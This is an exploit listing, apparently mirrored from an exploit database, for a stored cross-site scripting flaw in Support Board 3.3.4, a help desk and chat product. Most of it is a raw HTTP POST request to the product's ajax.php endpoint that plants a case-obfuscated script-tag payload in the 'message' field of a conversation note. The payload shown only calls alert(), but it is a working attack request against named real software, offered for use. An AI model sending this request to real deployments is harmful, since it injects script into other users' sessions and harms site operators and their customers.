Exploit for Support Board 3.3.4 Cross Site Scripting

Name: Exploit for Support Board 3.3.4 Cross Site Scripting
Rating: 5 (142 reviews)

2021-10-16 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:164525
# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)  
# Date: 16/10/2021  
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>  
# Vendor Homepage: https://board.support/  
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943  
# Version: 3.3.4  
# Tested on: Ubuntu 20.04.2 LTS, Windows 10  
  
POST /supportboard/include/ajax.php HTTP/1.1  
Cookie: [Agent+]  
Accept: */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 808  
X-Requested-With: XMLHttpRequest  
Connection: close  
  
function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false